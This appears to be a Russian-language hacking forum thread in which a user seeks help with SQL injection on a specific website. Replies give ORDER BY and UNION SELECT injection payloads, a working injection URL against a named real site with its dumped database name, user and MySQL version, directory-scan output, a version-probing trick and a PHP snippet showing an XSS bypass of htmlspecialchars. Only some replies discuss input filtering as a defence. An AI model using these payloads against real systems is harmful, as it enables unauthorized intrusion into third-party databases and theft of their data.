Пытаюсь делать SQL-инъекцию на одном ресурсе, при подстановке кавычки ко всем параметрам, которые проверил выводятся ворнинги такого плана: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ... Можно ли что-то сделать с этими параметрами?
fng: может и можно, а может и нельзя - ссылку в студию, попробуй перечитай свой вопрос и осознай, что разговариваешь с Землянами, а не с гуманоидными существами из галактики бетта, которые в совершенстве познали телепатию
2Pashkela, могут конечно быть дефекты, но все зависит от того что и где ты фильтруешь. P.S.: к стати, замечал на какой то из версий воблы используеться эта ф-я в ббкодах, действительно были дефекты. Но данная функция далеко не единственный способ защиты
Как ты пытаешься провести инъект, если ты даже не знаешь что он тебе отвечает? order by 10000 -- order by 1 -- order by 4 -- union select 1,2,3,4 -- выводит 2,4 например union select 1,concat_ws(0x3a,version(),user()),3,4 --
По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему. Но этот вопрос, ИМХО, не сюда нужно адавать, а в кодинг.
ну вот просканировал я директори, получилось вот что: Found [403]: mtl-consultants.com/.htaccess Found [403]:site.com/.htaccess~ Found [403]: site.com/.htpasswd Found [403]: site.com/.htpasswd~ Found [200]: .com/_notes/ Found [403]: .com/cgi-bin/ Found [403]: .com/cgi-sys/ Found [301]: .com/cpanel/ Found [200]: .com/email/ Found [301]: .com/images Found [403]: .com/mailman Found [301]: .com/pipermail Found [301]: .com/webmail Found [403]: .com/~root а что дальше? объясни плиз
А если например не изобретать непонятный велосипед, который возможно рухнет под интеллектуальным натиском, заюзать например пхп-класс который фильтрует всё и вся - PHP Input Filter
n-sider.com вот этот ресурс... статьи я читал, но по этой ошибке не нашел инфы к сожалению количество полей не получилось подобрать
1. UTF-7 2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код: PHP: <?php $a = "javascript:document.write('<script>alert(0)</script>');"; $data = htmlspecialchars($a); echo "<a href=$data>Tikni</a>"; ?> просто запустите и удивитесь сильно PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте
ну как бэ если на то пошло,то лучше будет для начала версию пробить,т.е. если 4.0 мускул union не катит +and+substring(version(),1,1)=4
http://www.n-sider.com/gameview.php?gameid=46+AND+1=2+UNION+SELECT+1,2-- [+] Current Database : nsider [+] Database User : [email protected] [+] MySQL Version : 5.0.67-userstats-log
2fng, Code: http://www.n-sider.com/gameview.php?gameid=-6399'+union+select+1,2,version(),4,5--+&view=screens вывод в свойставх картинки
Как бы ужасно это не звучало, но htmlentities приведет к тому же результату А вот strip_tags решит проблему PS: Надеюсь многолетние ламерские споры на этом закончатся
